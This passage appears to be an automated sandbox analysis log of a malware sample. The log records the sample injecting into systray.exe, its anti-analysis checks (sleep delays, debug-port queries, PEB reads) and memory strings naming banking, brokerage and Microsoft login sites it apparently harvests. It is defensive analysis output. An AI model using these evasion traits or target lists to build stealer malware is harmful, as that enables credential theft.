              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564Thread sleep time: -55500s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564Thread sleep count: 37 > 30Jump to behavior
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe TID: 1564Thread sleep time: -37000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0321CA20 FindFirstFileW,FindNextFileW,FindClose,4_2_0321CA20
              Source: at8-FI0k.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: at8-FI0k.4.drBinary or memory string: discord.comVMware20,11696428655f
              Source: at8-FI0k.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: systray.exe, 00000004.00000002.4499150314.00000000082E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428b"
              Source: at8-FI0k.4.drBinary or memory string: global block list test formVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: at8-FI0k.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: at8-FI0k.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: at8-FI0k.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: at8-FI0k.4.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: at8-FI0k.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: systray.exe, 00000004.00000002.4495421876.0000000003442000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2769054181.000001D7460EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: systray.exe, 00000004.00000002.4499150314.00000000082E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696428655b"
              Source: at8-FI0k.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: at8-FI0k.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: at8-FI0k.4.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: x6fGRpae78G.exe, 00000006.00000002.4495949176.0000000001569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: at8-FI0k.4.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: at8-FI0k.4.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: at8-FI0k.4.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: at8-FI0k.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: systray.exe, 00000004.00000002.4499150314.00000000082E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ropeVMware20,116B#
              Source: at8-FI0k.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: systray.exe, 00000004.00000002.4499150314.00000000082E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: recipient_nameVARCHAR pageVMware20,11696428655b"
              Source: at8-FI0k.4.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: at8-FI0k.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: at8-FI0k.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E rdtsc 0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_00CE7B63 LdrLoadDll,0_2_00CE7B63
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01180115 mov eax, dword ptr fs:[00000030h]0_2_01180115
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116A118 mov ecx, dword ptr fs:[00000030h]0_2_0116A118
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116A118 mov eax, dword ptr fs:[00000030h]0_2_0116A118
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116A118 mov eax, dword ptr fs:[00000030h]0_2_0116A118
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116A118 mov eax, dword ptr fs:[00000030h]0_2_0116A118
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov ecx, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov ecx, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov ecx, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov eax, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E10E mov ecx, dword ptr fs:[00000030h]0_2_0116E10E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F0124 mov eax, dword ptr fs:[00000030h]0_2_010F0124
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01158158 mov eax, dword ptr fs:[00000030h]0_2_01158158
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01154144 mov eax, dword ptr fs:[00000030h]0_2_01154144
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01154144 mov eax, dword ptr fs:[00000030h]0_2_01154144
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01154144 mov ecx, dword ptr fs:[00000030h]0_2_01154144
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01154144 mov eax, dword ptr fs:[00000030h]0_2_01154144
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01154144 mov eax, dword ptr fs:[00000030h]0_2_01154144
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6154 mov eax, dword ptr fs:[00000030h]0_2_010C6154
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6154 mov eax, dword ptr fs:[00000030h]0_2_010C6154
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC156 mov eax, dword ptr fs:[00000030h]0_2_010BC156
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194164 mov eax, dword ptr fs:[00000030h]0_2_01194164
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194164 mov eax, dword ptr fs:[00000030h]0_2_01194164
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114019F mov eax, dword ptr fs:[00000030h]0_2_0114019F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114019F mov eax, dword ptr fs:[00000030h]0_2_0114019F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114019F mov eax, dword ptr fs:[00000030h]0_2_0114019F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114019F mov eax, dword ptr fs:[00000030h]0_2_0114019F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01100185 mov eax, dword ptr fs:[00000030h]0_2_01100185
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164180 mov eax, dword ptr fs:[00000030h]0_2_01164180
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164180 mov eax, dword ptr fs:[00000030h]0_2_01164180
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA197 mov eax, dword ptr fs:[00000030h]0_2_010BA197
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA197 mov eax, dword ptr fs:[00000030h]0_2_010BA197
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA197 mov eax, dword ptr fs:[00000030h]0_2_010BA197
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117C188 mov eax, dword ptr fs:[00000030h]0_2_0117C188
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117C188 mov eax, dword ptr fs:[00000030h]0_2_0117C188
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E1D0 mov eax, dword ptr fs:[00000030h]0_2_0113E1D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E1D0 mov eax, dword ptr fs:[00000030h]0_2_0113E1D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0113E1D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E1D0 mov eax, dword ptr fs:[00000030h]0_2_0113E1D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E1D0 mov eax, dword ptr fs:[00000030h]0_2_0113E1D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011861C3 mov eax, dword ptr fs:[00000030h]0_2_011861C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011861C3 mov eax, dword ptr fs:[00000030h]0_2_011861C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F01F8 mov eax, dword ptr fs:[00000030h]0_2_010F01F8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011961E5 mov eax, dword ptr fs:[00000030h]0_2_011961E5
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01144000 mov ecx, dword ptr fs:[00000030h]0_2_01144000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01162000 mov eax, dword ptr fs:[00000030h]0_2_01162000
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE016 mov eax, dword ptr fs:[00000030h]0_2_010DE016
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE016 mov eax, dword ptr fs:[00000030h]0_2_010DE016
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE016 mov eax, dword ptr fs:[00000030h]0_2_010DE016
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE016 mov eax, dword ptr fs:[00000030h]0_2_010DE016
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01156030 mov eax, dword ptr fs:[00000030h]0_2_01156030
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA020 mov eax, dword ptr fs:[00000030h]0_2_010BA020
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC020 mov eax, dword ptr fs:[00000030h]0_2_010BC020
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01146050 mov eax, dword ptr fs:[00000030h]0_2_01146050
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C2050 mov eax, dword ptr fs:[00000030h]0_2_010C2050
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010EC073 mov eax, dword ptr fs:[00000030h]0_2_010EC073
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C208A mov eax, dword ptr fs:[00000030h]0_2_010C208A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011860B8 mov eax, dword ptr fs:[00000030h]0_2_011860B8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011860B8 mov ecx, dword ptr fs:[00000030h]0_2_011860B8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B80A0 mov eax, dword ptr fs:[00000030h]0_2_010B80A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011580A8 mov eax, dword ptr fs:[00000030h]0_2_011580A8
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011420DE mov eax, dword ptr fs:[00000030h]0_2_011420DE
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011020F0 mov ecx, dword ptr fs:[00000030h]0_2_011020F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C80E9 mov eax, dword ptr fs:[00000030h]0_2_010C80E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA0E3 mov ecx, dword ptr fs:[00000030h]0_2_010BA0E3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011460E0 mov eax, dword ptr fs:[00000030h]0_2_011460E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC0F0 mov eax, dword ptr fs:[00000030h]0_2_010BC0F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA30B mov eax, dword ptr fs:[00000030h]0_2_010FA30B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA30B mov eax, dword ptr fs:[00000030h]0_2_010FA30B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA30B mov eax, dword ptr fs:[00000030h]0_2_010FA30B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BC310 mov ecx, dword ptr fs:[00000030h]0_2_010BC310
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E0310 mov ecx, dword ptr fs:[00000030h]0_2_010E0310
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01198324 mov eax, dword ptr fs:[00000030h]0_2_01198324
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01198324 mov ecx, dword ptr fs:[00000030h]0_2_01198324
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01198324 mov eax, dword ptr fs:[00000030h]0_2_01198324
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01198324 mov eax, dword ptr fs:[00000030h]0_2_01198324
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01168350 mov ecx, dword ptr fs:[00000030h]0_2_01168350
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov eax, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov eax, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov eax, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov ecx, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov eax, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114035C mov eax, dword ptr fs:[00000030h]0_2_0114035C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118A352 mov eax, dword ptr fs:[00000030h]0_2_0118A352
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0119634F mov eax, dword ptr fs:[00000030h]0_2_0119634F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01142349 mov eax, dword ptr fs:[00000030h]0_2_01142349
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116437C mov eax, dword ptr fs:[00000030h]0_2_0116437C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E438F mov eax, dword ptr fs:[00000030h]0_2_010E438F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E438F mov eax, dword ptr fs:[00000030h]0_2_010E438F
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE388 mov eax, dword ptr fs:[00000030h]0_2_010BE388
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE388 mov eax, dword ptr fs:[00000030h]0_2_010BE388
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BE388 mov eax, dword ptr fs:[00000030h]0_2_010BE388
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8397 mov eax, dword ptr fs:[00000030h]0_2_010B8397
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8397 mov eax, dword ptr fs:[00000030h]0_2_010B8397
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8397 mov eax, dword ptr fs:[00000030h]0_2_010B8397
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011643D4 mov eax, dword ptr fs:[00000030h]0_2_011643D4
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011643D4 mov eax, dword ptr fs:[00000030h]0_2_011643D4
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA3C0 mov eax, dword ptr fs:[00000030h]0_2_010CA3C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C83C0 mov eax, dword ptr fs:[00000030h]0_2_010C83C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C83C0 mov eax, dword ptr fs:[00000030h]0_2_010C83C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C83C0 mov eax, dword ptr fs:[00000030h]0_2_010C83C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C83C0 mov eax, dword ptr fs:[00000030h]0_2_010C83C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E3DB mov eax, dword ptr fs:[00000030h]0_2_0116E3DB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E3DB mov eax, dword ptr fs:[00000030h]0_2_0116E3DB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E3DB mov ecx, dword ptr fs:[00000030h]0_2_0116E3DB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116E3DB mov eax, dword ptr fs:[00000030h]0_2_0116E3DB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011463C0 mov eax, dword ptr fs:[00000030h]0_2_011463C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117C3CD mov eax, dword ptr fs:[00000030h]0_2_0117C3CD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D03E9 mov eax, dword ptr fs:[00000030h]0_2_010D03E9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F63FF mov eax, dword ptr fs:[00000030h]0_2_010F63FF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE3F0 mov eax, dword ptr fs:[00000030h]0_2_010DE3F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE3F0 mov eax, dword ptr fs:[00000030h]0_2_010DE3F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE3F0 mov eax, dword ptr fs:[00000030h]0_2_010DE3F0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B823B mov eax, dword ptr fs:[00000030h]0_2_010B823B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0119625D mov eax, dword ptr fs:[00000030h]0_2_0119625D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A250 mov eax, dword ptr fs:[00000030h]0_2_0117A250
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0117A250 mov eax, dword ptr fs:[00000030h]0_2_0117A250
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C6259 mov eax, dword ptr fs:[00000030h]0_2_010C6259
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01148243 mov eax, dword ptr fs:[00000030h]0_2_01148243
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01148243 mov ecx, dword ptr fs:[00000030h]0_2_01148243
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010BA250 mov eax, dword ptr fs:[00000030h]0_2_010BA250
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B826B mov eax, dword ptr fs:[00000030h]0_2_010B826B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01170274 mov eax, dword ptr fs:[00000030h]0_2_01170274
